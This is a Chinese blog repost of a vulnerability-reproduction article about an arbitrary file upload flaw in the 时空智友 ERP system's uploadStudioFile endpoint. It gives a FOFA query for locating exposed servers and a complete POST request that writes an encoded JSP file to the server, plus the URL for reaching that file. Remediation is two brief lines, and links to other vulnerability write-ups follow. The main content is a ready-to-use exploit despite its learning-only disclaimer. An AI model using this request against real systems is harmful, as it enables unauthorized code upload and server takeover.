首页 > 其他分享 >【漏洞复现】时空智友ERP系统uploadStudioFile任意文件上传漏洞

【漏洞复现】时空智友ERP系统uploadStudioFile任意文件上传漏洞

时间:2024-10-29 09:21:29浏览次数:9  
标签:zh image uploadStudioFile 漏洞 空智 ERP

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

时空智友ERP系统是一款基于云计算和大数据的企业资源计划管理系统,旨在提高企业的运营效率、减少成本,并增强决策能力。该系统覆盖财务、供应链、生产、库存、人力资源和客户关系等多个领域,具备实时数据分析和业务智能功能,帮助企业灵活应对市场变化。# 二、使用步骤

二、漏洞描述

时空智友ERP系统updater.uploadStudioFile存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意软件,获取对服务器的远程访问权限或者破坏系统。

三、fofa语法

body="login.jsp?login=null"

四、漏洞复现

POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 484

content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>2020-10-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%31%32%33%34%35%36%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%20%25%3e-->

在这里插入图片描述

访问http://ip/update/temp/studio/test.jsp

在这里插入图片描述
批量检测(工具链接在知识星球):
在这里插入图片描述

五、修复建议

1、禁⽌公⽹访问该系统。
2、及时升级产品到最新版本。
网安交流群

在这里插入图片描述


原文始发于微信公众号(白帽攻防):【漏洞复现】时空智友ERP系统uploadStudioFile任意文件上传漏洞

标签:zh,image,uploadStudioFile,漏洞,空智,ERP
From: https://blog.csdn.net/m0_46381222/article/details/143319717

相关文章

  • Tenda路由器账号密码信息泄露漏洞
    免责声明请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、简介Tenda是一家中国的网络设备制造商,成立于1999年,专注于提供各种网络产品,......
  • 新接口0day全程云DocumentDocService.asmx接口存在任意文件上传漏洞
     0x01阅读须知        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用......
  • 新接口 易宝OA-ExecuteSqlForDataSet接口存在SQL注入漏洞
    0x01阅读须知        本文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考。本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁......
  • 高校智慧平台SExcelExpErr存在SQL注入漏洞
    0x01阅读须知        本文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考。本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁......
  • ctfshow(151->154)--文件上传漏洞--.user.ini
    Web151进入界面:审计:提示是前台校验。存在图片上传。思路:先编写一个一句话木马文件://shell.php<?php@eval($_POST[1]);?>既然是前端校验,我们查看页面源代码找到相关的校验内容:说明只允许上传.png后缀的文件。我们修改代码为允许上传.php文件:然后上传一句话......
  • 漏洞扫描
    漏洞关注点1、漏洞编号2、漏洞具体原因3、漏洞修复建议4、确认是否真实存在漏洞一、zk未授权访问漏洞1)检查:我们在zoo.cfg中添加如下一行代码并保存退出(如果有不必添加)4lw.commands.whitelist=*2)鉴权:3)访问:shzkCli.sh-server$ip:32181查看:getAcl/设置......
  • 易飞ERP API V9.2 接口
    接口功能还在不断开发中,若何易飞有对接需求可以看看。采购模块,销售模块,生产模块,基本已经写的差不对了。接口下载地址:https://download.csdn.net/download/S3_SH/89929671下载文件中有每个接口详细调用说明,以下是随机接口说明截图:......
  • Web渗透文件上传有哪些漏洞
    Web渗透文件上传有以下漏洞:一、绕过文件类型检查漏洞;二、文件名解析漏洞;三、目录穿越漏洞;四、二进制文件漏洞;五、文件上传时的身份验证和授权问题;等等。绕过文件类型检查漏洞会导致应用程序将恶意文件误认为合法文件,从而允许攻击者执行恶意操作。一、绕过文件类型检查漏洞文......
  • 【漏洞复现】致远互联 FE协作办公平台 fillKP.jsp SQL注入漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 漏洞挖掘和渗透测试的区别是什么?(非常详细),零基础入门到精通,看这一篇就够了
    前言在网络安全领域,漏洞挖掘和渗透测试是两个至关重要的概念,它们各自扮演着不同的角色,共同为提升网络系统的安全性贡献力量。漏洞挖掘和渗透测试的区别是什么?一、漏洞挖掘:深入剖析安全隐患​漏洞挖掘,又称漏洞发现,是指通过一系列技术手段和方法,对目标系统、软件或网络进......